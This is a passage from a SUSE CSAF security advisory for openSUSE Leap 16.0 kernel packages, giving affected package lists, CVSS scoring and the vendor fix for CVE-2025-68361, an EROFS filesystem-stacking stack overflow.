"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68360"
},
{
"cve": "CVE-2025-68361",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68361"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: limit the level of fs stacking for file-backed mounts\n\nOtherwise, it could cause potential kernel stack overflow (e.g., EROFS\nmounting itself).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68361",
"url": "https://www.suse.com/security/cve/CVE-2025-68361"
},
{
"category": "external",
"summary": "SUSE Bug 1255526 for CVE-2025-68361",
"url": "https://bugzilla.suse.com/1255526"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
